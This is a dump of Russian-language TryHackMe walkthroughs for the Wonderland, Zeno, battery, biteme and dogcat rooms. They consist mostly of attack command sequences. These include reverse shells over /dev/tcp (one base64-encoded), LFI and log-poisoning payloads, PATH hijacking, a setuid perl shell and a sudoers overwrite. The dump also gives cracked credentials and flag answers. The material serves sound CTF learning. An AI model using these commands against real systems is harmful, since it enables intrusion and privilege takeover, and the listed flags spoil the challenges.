f4e788f87cc3afaecbaf0f0fe9ae6ad7 73 | ``` 74 | 75 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Wonderland.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Wonderland](https://tryhackme.com/r/room/wonderland) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Войдите в Страну Чудес и захватите флаги. 8 | 9 | 10 | 11 | ### Ответьте на вопросы ниже 12 | Получить флаг в user.txt 13 | ```commandline 14 | nmapj -sC -sV 15 | /data/src/dirsearch/dirsearch.py -u http://10.10.125.113/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt 16 | wget http:///img/white_rabbit_1.jpg 17 | steghide info white_rabbit_1.jpg 18 | steghide extract -sf white_rabbit_1.jpg 19 | cat hint.txt 20 | # follow the r a b b i t 21 | curl -s http:///r/a/b/b/i/t/ 22 | # alice:HowDothTheLittleCrocodileImproveHisShiningTail 23 | ssh alice@ 24 | cat /root/user.txt 25 | ``` 26 | 27 | ```commandline 28 | thm{"Curiouser and curiouser!"} 29 | ``` 30 | + 20 31 | Повысьте свои привилегии, какой флаг в root.txt? 32 | ```commandline 33 | ls -la /home 34 | cat walrus_and_the_carpenter.py 35 | python3 walrus_and_the_carpenter.py 36 | sudo -l 37 | cat > random.py << EOF 38 | 39 | import os 40 | os.system("/bin/bash") 41 | EOF 42 | 43 | sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py 44 | whoami 45 | file teaParty 46 | ./teaParty 47 | 48 | cat > date << EOF 49 | #!/bin/bash 50 | /bin/bash 51 | EOF 52 | 53 | chmod +x date 54 | export PATH=/home/rabbit:$PATH 55 | ./teaParty 56 | whoami 57 | cd /home/hatter/ 58 | cat password.txt 59 | # WhyIsARavenLikeAWritingDesk? 60 | perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' 61 | whoami 62 | cat /home/alice/root.txt 63 | ``` 64 | ```commandline 65 | thm{Twinkle, twinkle, little bat! How I wonder what you’re at!} 66 | ``` 67 | 68 | 69 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Zeno.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Zeno](https://tryhackme.com/r/room/zeno) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Проведите тест на проникновение на уязвимой машине. Ваша конечная цель — стать пользователем root и получить два флага: 8 | 9 | `/home/{{user}}/user.txt 10 | /root/root.txt` 11 | Флаги всегда имеют один и тот же формат, где XYZ — это хеш MD5 : THM {XYZ} 12 | 13 | Полная загрузка компьютера может занять некоторое время, поэтому, пожалуйста, наберитесь терпения! :) 14 | 15 | ### Ответьте на вопросы ниже 16 | Виртуальная машина загружена! 17 | ```commandline 18 | Ответ не нужен 19 | ``` 20 | 21 | ## Задание 2 22 | Yдачи! 23 | ### Ответьте на вопросы ниже 24 | Содержимое user.txt 25 | ```commandline 26 | nmap -sSCV -p- 27 | gobuster dir -u http://:12340/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 28 | searchsploit Restaurant Management System 29 | python3 47520.py http://:12340/rms/ 30 | http://:12340/rms/images/reverse-shell.php/?cmd=id 31 | sh -i >& /dev/tcp/ /4444 0>&1 32 | echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNC43OC84MCAwPiYxCg==|base64 -d|bash 33 | nc -nvlp 4444 34 | cat config.php 35 | cat /etc/fstab 36 | # username: zeno 37 | # password: FrobjoodAdkoonceanJa 38 | ssh edward@ 39 | ls 40 | cat user.txt 41 | ``` 42 | ```commandline 43 | THM{070cab2c9dc622e5d25c0709f6cb0510} 44 | ``` 45 | Содержимое root.txt 46 | ```commandline 47 | sudo -l 48 | /bin/sh -c 'echo "edward ALL=(root) NOPASSWD: ALL" > /etc/sudoers' 49 | sudo /usr/sbin/reboot 50 | sudo su 51 | cat /root/root.txt 52 | ``` 53 | ```commandline 54 | THM{b187ce4b85232599ca72708ebde71791} 55 | ``` 56 | Получил доступ как пользователь root. 57 | ```commandline 58 | Ответ не нужен 59 | ``` 60 | 61 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/battery.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [battery](https://tryhackme.com/r/room/battery) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Портал счетов за электроэнергию уже много раз взламывался, поэтому мы уволили одного из сотрудников службы 8 | безопасности. Как новичок, вы должны работать как хакер, чтобы найти лазейки в портале и получить root-доступ к 9 | серверу. 10 | 11 | Надеюсь, вам понравится это путешествие! 12 | 13 | Не публиковать описание/прохождение до 19/01/2021 14 | 15 | ### Ответьте на вопросы ниже 16 | Базовый флаг: 17 | ```commandline 18 | nmap -sSCV 19 | gobuster dir -u http:// -w /usr/share/dirb/wordlists /common.txt -x txt,php 20 | /register.php 21 | /report 22 | strings report 23 | echo "base64EncodedString" | base64 -d >> output.php 24 | cyber:super#secure&password! 25 | ssh cyber@ 26 | cat flag1.txt 27 | ``` 28 | ```commandline 29 | THM{6f7e4dd134e19af144c88e4fe46c67ea} 30 | ``` 31 | Флаг пользователя: 32 | ```commandline 33 | sudo -l 34 | echo 'import os; os.system("/bin/sh")' > /home/cyber/run.py 35 | chmod +x run.py 36 | cyber@ubuntu:~$ sudo /usr/bin/python3 /home/cyber/run.py 37 | whoami 38 | # cat /root/root.txt 39 | ``` 40 | ```commandline 41 | THM{20c1d18791a246001f5df7867d4e6bf5} 42 | ``` 43 | Корневой флаг: 44 | ```commandline 45 | cd /home 46 | ls 47 | cyber yash 48 | cd cybr 49 | ls 50 | cyber yash 51 | emergency.py fernet flag2.txt root.txt 52 | cat flag2.txt 53 | ``` 54 | ```commandline 55 | THM{db12b4451d5e70e2a177880ecfe3428d} 56 | ``` 57 | 58 | 59 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/biteme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [biteme](https://tryhackme.com/r/room/biteme) 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Запустите машину и получите флаги... 10 | ### Ответьте на вопросы ниже 11 | Что такое флаг пользователя? 12 | ```commandline 13 | THM{6fbf1fb7241dac060cd3abba70c33070} 14 | ``` 15 | Что такое корневой флаг? 16 | ```commandline 17 | THM{0e355b5c907ef7741f40f4a41cc6678d} 18 | ``` 19 | 20 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/dogcat.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [dogcat](https://tryhackme.com/r/room/dogcat) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Я сделал этот сайт для просмотра изображений кошек и собак с помощью PHP. Если вам грустно, заходите посмотреть на 8 | собак/кошек! 9 | 10 | Для полного запуска машины может потребоваться несколько минут. 11 | 12 | ### Ответьте на вопросы ниже 13 | + 10 14 | Что такое флаг 1? 15 | ```commandline 16 | nmap -sC -sV 17 | curl -s "http:///?view=php://filter/read=convert.base64-encode/resource=./dog/../index" 18 | curl -s "http:///?view=php://filter/read=convert.base64-encode/resource=dog" | grep "Here you go" 19 | echo "PGltZyBzcmM9ImRvZ3MvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K" | base64 -d 20 | curl -s "http:///?view=php://filter/read=convert.base64-encode/resource=cat" | grep "Here you go" 21 | echo "PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K" | base64 -d 22 | curl -s "http:///?view=./dog/../../../../var/log/apache2/access.log&ext" 23 | 24 | vim shell.php 25 | # php reverse shell 26 | 27 | sudo python -m http.server 80 28 | curl -A "/shell.php')); ?>" \ 29 | ns -nlvp 4444 30 | find / -name *flag* 2>/dev/null 31 | cat /var/www/html/flag.php 32 | ``` 33 | ```commandline 34 | THM{Th1s_1s_N0t_4_Catdog_ab67edfa} 35 | ``` 36 | + 25 37 | Что такое флаг 2? 38 | ```commandline 39 | cat /var/www/flag2_QMW7JvaY2LvK.txt 40 | ``` 41 | ```commandline 42 | THM{LF1_t0_RC3_aec3fb} 43 | ``` 44 | + 30 45 | Что такое флаг 3? 46 | ```commandline 47 | sudo -l 48 | sudo /usr/bin/env /bin/bash 49 | cat /root/flag3.txt 50 | ``` 51 | ```commandline 52 | THM{D1ff3r3nt_3nv1ronments_874112} 53 | ``` 54 | + 50 55 | Что такое флаг 4? 56 | ```commandline 57 | cd /opt/backups 58 | ls -l 59 | cat backup.sh 60 | printf '#!/bin/bash\nbash -i >& /dev/tcp//8080 0>&1' > backup.sh 61 | nc -nlvp 8080 62 | whoami 63 | hostname 64 | ls -l 65 | cat flag4.txt 66 | ``` 67 | ```commandline 68 | THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} 69 | ``` 70 | 71 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2023 BEPb 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /art/top1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/tryhackme/615dab4da397d89eef709005645cdea4186dd16d/art/top1.png -------------------------------------------------------------------------------- /art/tryhackme.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/tryhackme/615dab4da397d89eef709005645cdea4186dd16d/art/tryhackme.jpeg --------------------------------------------------------------------------------